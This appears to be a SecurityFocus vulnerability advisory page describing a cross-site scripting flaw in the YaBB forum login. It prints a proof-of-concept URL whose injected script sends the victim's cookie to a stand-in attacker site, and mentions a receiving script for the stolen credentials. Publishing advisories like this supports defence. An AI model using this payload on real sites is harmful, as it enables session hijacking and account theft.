Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

YaBB Login Cross-Site Scripting Vulnerability

The following example was submitted by Assaf Reshef and Nir Adar:

http://example.com/forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>window.location.href(%22http://www.attackersite.example.com/hack.asp?%22%2Bdocument.cookie)</script>

An ASP script was also provided which will receive stolen cookie-based authentication credentials.







 

Privacy Statement
Copyright 2009, SecurityFocus